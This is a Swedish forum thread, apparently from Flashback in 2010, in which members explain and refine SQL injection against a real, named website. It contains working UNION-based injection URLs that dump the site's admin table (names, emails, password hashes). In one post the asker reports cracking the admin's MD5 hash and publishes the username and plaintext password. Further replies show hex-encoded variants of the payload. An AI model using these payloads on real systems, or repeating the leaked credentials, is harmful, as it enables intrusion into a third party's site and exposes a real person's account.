Vinnaren i pepparkakshustävlingen!
  1. Dator och IT
  2. Systemutveckling
  3. Databaser

SQL Fråga

Svara
2010-11-19, 02:42
  #1
Air0x
Medlem
Air0xs avatar
Tjenare!
Har hållt på med sql ett tag nu men får inte ihop detta: http://www.wlan-forum.com/article.ph...a=database()-- någon som skulle kunna förklara vad group_concat(table_name) gör?
sedan se jag endel som använder -- i slutet av något vad gör de?
Och till sisst te.x productid-= 1337 varför har man -=1337 (ett minus innan) ?
Citera
2010-11-19, 08:50
  #2
ant'
Medlem
ant's avatar
group_concat(table_name) används för att hämta ut en grupp med data ur kolumnen table_name (max 1024 tecken om jag kommer ihåg korrekt).

-- visar att det är slut på SQL queryn.

Jag antar att du menar ID=-1337
Man sätter ett negativt värde så man slipper att sidan hämtar ut data ur databasen som kan hindra att du ser det du egentligen vill se.
Citera
2010-11-19, 10:53
  #3
Air0x
Medlem
Air0xs avatar
Citat:
Ursprungligen postat av ant'
group_concat(table_name) används för att hämta ut en grupp med data ur kolumnen table_name (max 1024 tecken om jag kommer ihåg korrekt).

-- visar att det är slut på SQL queryn.

Jag antar att du menar ID=-1337
Man sätter ett negativt värde så man slipper att sidan hämtar ut data ur databasen som kan hindra att du ser det du egentligen vill se.
Ok tack för svar, om vi säger att vi har ett table som heter admins och så vill jag få ut allt därifrån borde inte "SELECT * FROM admins" gå då?
Citera
2010-11-19, 12:18
  #4
Ryne
Medlem
Rynes avatar
Visa alla kolumner som finns i nuke_authors.
Kod: 
http://www.wlan-forum.com/article.php?sid=241+and+1=0+union+select+all+1,2,3,4,5,group_concat(column_name),7,8,9,10,11+from+in  formation_schema.columns+where+table_schema=database()+AND+table_name='nuke_authors'

Visa data som finns i nuke_authors, ändra limit för nästa rad.
Kod: 
http://www.wlan-forum.com/article.php?sid=241+and+1=0+union+select+all+1,2,3,4,5,concat_ws(0x3b,aid,name,email,pwd),7,8,9,10,1  1+from+nuke_authors+limit+1,1--
Citera
2010-11-19, 14:02
  #5
Air0x
Medlem
Air0xs avatar
Citat:
Ursprungligen postat av Ryne
Visa alla kolumner som finns i nuke_authors.
Kod: 
http://www.wlan-forum.com/article.php?sid=241+and+1=0+union+select+all+1,2,3,4,5,group_concat(column_name),7,8,9,10,11+from+in  formation_schema.columns+where+table_schema=database()+AND+table_name='nuke_authors'

Visa data som finns i nuke_authors, ändra limit för nästa rad.
Kod: 
http://www.wlan-forum.com/article.php?sid=241+and+1=0+union+select+all+1,2,3,4,5,concat_ws(0x3b,aid,name,email,pwd),7,8,9,10,1  1+from+nuke_authors+limit+1,1--
Tack så mycket men jag vill veta hur de fungerar också hatar när man får allt serverat
Lyckades iaf få tag i hans username och pw i md5 och cracka de med rainbow table
info:

username: oej
password: tokyo47

Kan du exakt förklara vad: http://www.wlan-forum.com/article.ph...wd),7,8,9,10,1 1+from+nuke_authors+limit+1,1-- gör thanks ?
Citera
2010-11-19, 14:20
  #6
ant'
Medlem
ant's avatar
Citat:
Ursprungligen postat av Ryne
Visa alla kolumner som finns i nuke_authors.
Kod: 
http://www.wlan-forum.com/article.php?sid=241+and+1=0+union+select+all+1,2,3,4,5,group_concat(column_name),7,8,9,10,11+from+in  formation_schema.columns+where+table_schema=database()+AND+table_name='nuke_authors'

Visa data som finns i nuke_authors, ändra limit för nästa rad.
Kod: 
http://www.wlan-forum.com/article.php?sid=241+and+1=0+union+select+all+1,2,3,4,5,concat_ws(0x3b,aid,name,email,pwd),7,8,9,10,1  1+from+nuke_authors+limit+1,1--
Du behöver inte where table_schema=database() då du ändå automatiskt hämtar data ur den nuvarande databasen (database() är den databas som används på den sidan du är inne på).

Sen bör du hexa tabellnamnen likt så:
Kod: 
UNION SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name=0x6e756b655f617574686f7273

Och sen är det egentligen UNION ALL SELECT och inte UNION SELECT ALL, fast UNION SELECT funkar också lika bra.

Till TS:
Sök gärna innan du postar:
SQL-injectiontråden
https://www.flashback.org/t823772
__________________
Senast redigerad av ant' 2010-11-19 kl. 14:27.
Citera
2010-11-19, 17:28
  #7
qrizze
Medlem
qrizzes avatar
Tråd -> Databaser

//mod
Citera
Svara

Stöd Flashback

Flashback finansieras genom donationer från våra medlemmar och besökare. Det är med hjälp av dig vi kan fortsätta erbjuda en fri samhällsdebatt. Tack för ditt stöd!

Stöd Flashback